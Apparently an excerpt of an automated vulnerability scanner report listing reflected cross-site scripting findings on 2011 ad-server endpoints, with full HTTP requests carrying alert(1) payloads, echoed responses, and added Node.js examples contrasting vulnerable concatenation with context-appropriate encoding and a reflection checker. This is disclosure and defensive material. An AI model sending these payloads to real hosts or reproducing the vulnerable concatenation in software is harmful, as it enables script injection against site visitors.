GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$&d4b37'-alert(1)-'600aca90b1e=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.9. http://a.collective-media.net/adj/cm.drudgerep/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.drudgerep/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b527'-alert(1)-'c296858d3f2 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.drudgerep/;sz=300x250;click0=;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 444
Date: Mon, 14 Feb 2011 02:10:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 02:10:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.drudgerep/;sz=300x250;net=cm;ord=$cacheBuster$1b527'-alert(1)-'c296858d3f2;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.10. http://a.rfihub.com/sed [pa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e6c4'><script>alert(1)</script>cd7c8900c9b was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
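The two contexts described in this finding and in 1.9 above (a single-quoted JavaScript string literal and a single-quoted HTML attribute value, with the double-quoted JavaScript string of the DoubleClick findings as a variant) are shown below as an added Node.js example. It is not code from the scanned ad servers: the hostnames are placeholders (example.invalid), the page fragments are reduced to the one line that matters, and the helper names jsStringLiteral, htmlAttr, alertCalls, tagStarts and singleQuotes are the example's own. The payloads are the ones the report submitted.

```javascript
// Added example (Node.js), not code from the scanned ad servers: the two
// reflection contexts this report describes, shown as the vulnerable
// concatenation and then with output encoding that matches the context.
// Hostnames are placeholders (example.invalid); payloads are the report's.

// Encoder for the JavaScript string context. JSON.stringify escapes quotes
// and backslashes; the extra replacements cover '<' and '>' (so "</script>"
// cannot close an enclosing script block) and U+2028/U+2029, which older
// engines treated as line terminators inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Encoder for the HTML attribute context: every character that can end an
// attribute value or start a tag becomes an entity.
function htmlAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// JS string context, vulnerable form: raw concatenation into a quoted
// literal, the pattern behind the sz, click and parameter-name findings.
function vulnerableJsContext(value, quote) {
  return 'var url = ' + quote + 'http://example.invalid/?x=' + value + quote + ';';
}

// JS string context, hardened form: the value is emitted as its own literal,
// so a quote inside it cannot terminate the literal.
function hardenedJsContext(value) {
  return 'var url = "http://example.invalid/?x=" + ' + jsStringLiteral(value) + ';';
}

// HTML attribute context, vulnerable form, modelled on the tk.gif pixel in
// the a.rfihub.com response: the pa value lands inside a single-quoted src.
function vulnerableAttrContext(pa) {
  return "<img width=0 height=0 src='http://example.invalid/tk.gif?pa=" + pa + "'>";
}

// URL-encoding alone is not enough: encodeURIComponent leaves the single
// quote untouched, so the attribute can still be closed.
function urlEncodedOnlyAttrContext(pa) {
  return "<img width=0 height=0 src='http://example.invalid/tk.gif?pa=" + encodeURIComponent(pa) + "'>";
}

// Hardened form: encode for the URL first (inner context), then for the
// attribute (outer context).
function hardenedAttrContext(pa) {
  return "<img width=0 height=0 src='http://example.invalid/tk.gif?pa=" + htmlAttr(encodeURIComponent(pa)) + "'>";
}

// Executes generated JavaScript with a stub alert and returns how many times
// it was called: 1 means the payload broke out of the string literal.
function alertCalls(jsSource) {
  let calls = 0;
  new Function('alert', jsSource)(() => { calls += 1; });
  return calls;
}

// Rough HTML checks: number of tag openings and of raw single quotes in the
// markup (the hardened pixel has one tag and exactly the two quotes that
// delimit its src attribute).
function tagStarts(html) { return (html.match(/<[a-zA-Z]/g) || []).length; }
function singleQuotes(html) { return (html.match(/'/g) || []).length; }

if (typeof require !== 'undefined' && require.main === module) {
  const jsPayload = "1b527'-alert(1)-'c296858d3f2";
  const attrPayload = "7e6c4'><script>alert(1)</script>cd7c8900c9b";
  console.log('vulnerable JS :', alertCalls(vulnerableJsContext(jsPayload, "'")), 'alert call(s)');
  console.log('hardened JS   :', alertCalls(hardenedJsContext(jsPayload)), 'alert call(s)');
  console.log('vulnerable img:', tagStarts(vulnerableAttrContext(attrPayload)), 'tag(s)');
  console.log('url-enc img   :', singleQuotes(urlEncodedOnlyAttrContext(attrPayload)), 'quote(s)');
  console.log('hardened img  :', tagStarts(hardenedAttrContext(attrPayload)), 'tag(s)');
}
```

Run it with node: the stub alert counts calls, so the vulnerable templates report one call and the hardened ones none. The url-encoded-only pixel still carries three apostrophes because encodeURIComponent does not touch that character, which is why attribute encoding is layered on top of URL encoding rather than replaced by it.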

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; b="aAMN9qejw==AD741AAABLgrfWIY=AD793AAABLgrfWIY=AD809AAABLgrfWIY=AD825AAABLgrfWIY=AD736AAABLgrfWIY=AD781AAABLgrfWIY=AD829AAABLgrfWIY=AD748AAABLgrfWIY=AD801AAABLgrfWIY=AD773AAABLgrfWIY=AD747AAABLgrfWIY=AD805AAABLgBphCs="; m="aAGRcyqzg==AI20472726AAABLgrfWIc=AI20472726AAABLgrTunc=AI20472726AAABLgq3K4s=AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAG9rzUwA==A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; 
c="aAh4fa6Qg==AFd1243AB3AAABLhsS7_c=AFv2946AB3AAABLhsS7_c=AGu14941AB3AAABLhsS7_c=AFc1243AB3AAABLhsS7_c=AFl2946AB3AAABLhsS7_c=AGt14941AB3AAABLhsS7_c=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aAFSdsTtQ==AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; e=cd

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAHN7Dy1Q==A_ax3hqHhIaQ7kH|15705|73433|68086|14121|1243|92574|445|32981|7792AAABLiHOrUw=A_aBXkOpUe5j7vA|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsS7_s=A_akezhu0C40Skt|15706|73437|68086|14121|1243|92405|445|32981|7792AAABLhsSR2I=A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: c="aAh0Fw84g==AFd1243AB4AAABLiHOrUg=AFv2946AB4AAABLiHOrUg=AGu14941AB4AAABLiHOrUg=AFc1243AB4AAABLiHOrUg=AFl2946AB4AAABLiHOrUg=AGt14941AB4AAABLiHOrUg=AGb15705AB2AAABLiHOrUg=AGa15705AB2AAABLiHOrUg=AGb15706AB2AAABLhsS7_c=AGa15706AB2AAABLhsS7_c=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: f="aAGmgjuLw==AK1297647316AB1AAABLiHOrUg=AK1297534306AB2AAABLhsS7_c=AK1297259930AB2AAABLgrfWIY=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Wed, 15-Aug-12 01:35:16 GMT
Content-Length: 2175

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647316296;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,x3hqHhIaQ7kH,http%3A%2F%2Frocketfuelinc.com,776,2946,32981,1879,7792&pa=ppre6473367353167e6c4'><script>alert(1)</script>cd7c8900c9b&id=&ra=6473163000.11331372547018437'>
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc59a"-alert(1)-"ed8a505e8a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The response shows why the parameter name does not matter: the ad server appends the full query string, unknown parameters included, to the click-through URL it writes into the inline script, so any name an attacker chooses is reflected. Because this response is served as text/html, a victim who follows a crafted ad.doubleclick.net link executes the injected script in that origin.
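The "echoed unmodified" verdict in these findings comes from a reflection check: submit a probe with a random prefix, the metacharacters under test, and a random suffix, then see which of those characters come back literally. The Node.js code below re-implements that check so a finding can be re-verified from a saved response; it is an added example, not the scanner's code. The two sample bodies are constructed, modelled on the ad.doubleclick.net snippet above with placeholder hosts, and the names reflectionReport, ENCODED_FORMS and PROBE are the example's own.

```javascript
// Added example (Node.js), not the scanner's own code: the reflection check
// behind the "echoed unmodified" verdicts in this report, re-implemented so
// a finding can be re-verified from a saved response. The probe has the same
// shape as the report's payloads (random prefix, characters under test,
// random suffix). Sample bodies below are constructed, with placeholder hosts.

const METACHARS = ['"', "'", '<', '>'];

// Encoded forms a server might return instead of the raw character; matching
// is case-insensitive so %3C and %3c both count.
const ENCODED_FORMS = {
  '"': ['%22', '&quot;', '&#34;', '&#x22;', '\\"'],
  "'": ['%27', '&#39;', '&#x27;', '&apos;', "\\'"],
  '<': ['%3c', '&lt;', '&#60;', '&#x3c;', '\\u003c'],
  '>': ['%3e', '&gt;', '&#62;', '&#x3e;', '\\u003e'],
};

// probe = { prefix, meta, suffix }; contentType is the response Content-Type.
function reflectionReport(body, probe, contentType = 'text/html') {
  // Only the first echo is inspected; a second copy (e.g. a reflected
  // Referer) would need a second pass starting after this one.
  const start = body.indexOf(probe.prefix);
  if (start < 0) return { reflected: false };
  const end = body.indexOf(probe.suffix, start + probe.prefix.length);
  if (end < 0) return { reflected: false };
  const echoed = body.slice(start + probe.prefix.length, end);
  const tested = METACHARS.filter((c) => probe.meta.includes(c));
  const surviving = tested.filter((c) => echoed.includes(c));
  const encodedAs = {};
  for (const c of tested) {
    if (surviving.includes(c)) continue;
    const form = ENCODED_FORMS[c].find((f) => echoed.toLowerCase().includes(f.toLowerCase()));
    encodedAs[c] = form || 'stripped';
  }
  // Script context: either the whole body is JavaScript (as with the
  // application/x-javascript responses from a.collective-media.net) or the
  // echo sits inside an unclosed <script> element.
  const before = body.slice(0, start);
  const opens = (before.match(/<script\b/gi) || []).length;
  const closes = (before.match(/<\/script\s*>/gi) || []).length;
  const inScript = /javascript|ecmascript/i.test(contentType) || opens > closes;
  const tail = end + probe.suffix.length;
  return {
    reflected: true,
    echoed,
    surviving,
    encodedAs,
    inScript,
    // 40 characters either side, for a human to confirm the enclosing quote.
    context: body.slice(Math.max(0, start - 40), start) + '[' + echoed + ']' + body.slice(tail, tail + 40),
  };
}

// Constructed sample: the click URL is built inside a script block and the
// unknown query parameter is appended to it unencoded.
const SAMPLE_VULNERABLE = `<html><head><title>Advertisement</title></head><body>
<script type="text/javascript">
var url = escape("http://ad.example.invalid/click;h=v8/3aae/0/0;~sscs=?http://a.example.invalid/aci/124_0_YWE9&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2fwww.example.invalid/");
var wmode = "opaque";
</script></body></html>`;

// Same page after a fix that percent-encodes the query string.
const SAMPLE_FIXED = SAMPLE_VULNERABLE.replace('dc59a"-alert(1)-"ed8a505e8a7', 'dc59a%22-alert(1)-%22ed8a505e8a7');

const PROBE = { prefix: 'dc59a', meta: '"-alert(1)-"', suffix: 'ed8a505e8a7' };

if (typeof require !== 'undefined' && require.main === module) {
  console.log(reflectionReport(SAMPLE_VULNERABLE, PROBE));
  console.log(reflectionReport(SAMPLE_FIXED, PROBE));
}
```

The vulnerable sample reports the double quote as surviving inside a script block; the fixed sample reports it as coming back as %22. The context field is there because automatic quote detection is unreliable once the JavaScript string itself contains HTML with quotes, as in the a.collective-media.net response above, so the enclosing quote is best confirmed by eye.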

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:36:01 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6107

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
okv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&dc59a"-alert(1)-"ed8a505e8a7=1http%3a%2f%2ft.mookie1.com/t/v1/clk%3FmigAgencyId%3D188%26migSource%3Dadsrv2%26migTrackDataExt%3D2426847%3B58824910%3B234278619%3B39992677%26migRandom%3D2161819%26migTrackFmtExt%3Dclient%3Bio%3Bad%3B
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcff3"-alert(1)-"0f153e75e05 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

As in 1.9, "sz parameter" is the scanner's name for the whole semicolon-delimited tail of the path; the payload is appended to the end of the click= URL, which the server reflects into the double-quoted click-through URL inside the inline script.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297647300104;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=6473367370.8131766689475626&rb=445&ca=&rc=10.2&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre647336735316&pb=&pc=&pd=&pg=&ct=1297647336737&pe=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html&pf=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-dyn%2Fcontent%2Farticle%2F2011%2F02%2F13%2FAR2011021301463.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:35:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6007

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,082 Template Name = 2. Banner Creative (Flash) - In Pa
...[SNIP]...
Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSxjeVk4UkM5UTJ5TVAscCw3NzYsMjk0NiwzMjk4MSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5bcff3"-alert(1)-"0f153e75e05http://t.mookie1.com/t/v1/clk?migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58824910;234278619;39992677&migRandom=2145756&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://www.univers
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N4270.Media6Degrees.com/B5094437.9 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4270.Media6Degrees.com/B5094437.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57a15"-alert(1)-"a5169947ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N4270.Media6Degrees.com/B5094437.9;sz=300x250;ord=1297649785346;click0=http://ad.media6degrees.com/adserv/clk?tId=4401087500065260|cId=5193|cb=1297649784|notifyPort=8080|exId=23|tId=4401087500065260|ec=1|secId=859|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|advId=891|notifyServer=asd116.sd.pl.pvt|spId=26917|adType=iframe|invId=3159|bid=1.53|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK&57a15"-alert(1)-"a5169947ca5=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4401087500065260|cb=1297649784|adType=iframe|cId=5193|ec=1|spId=26917|advId=891|exId=23|price=AAABLiH0WMa4m9TZK-nhGAJNtNF-bSex1RpF1w|pubId=300|secId=859|invId=3159|notifyServer=asd116.sd.pl.pvt|notifyPort=8080|bid=1.53|srcUrlEnc=http%3A%2F%2Fwww.drudgereport.com%2F|ctrack=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3CMAwG0I9fReoaXC01rlM3Q3DgxtVN7BkYo1sxDhITUN79DTgAuInzOvMk1EYeSbxnqqsUWqo3iwhW14Tj_bm9Bpz-YzIu2jLTomb7qEwWcyYX7UWYe419nAHlhAvwfSRcgfcHP_GHBIVzAAAA%26dst%3Dhttp%253A%252F%252Fwww.adobe.com%252Fproducts%252Fcreativesuite%252Fdesign%252F%253Fsdid%253DIEFXK
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
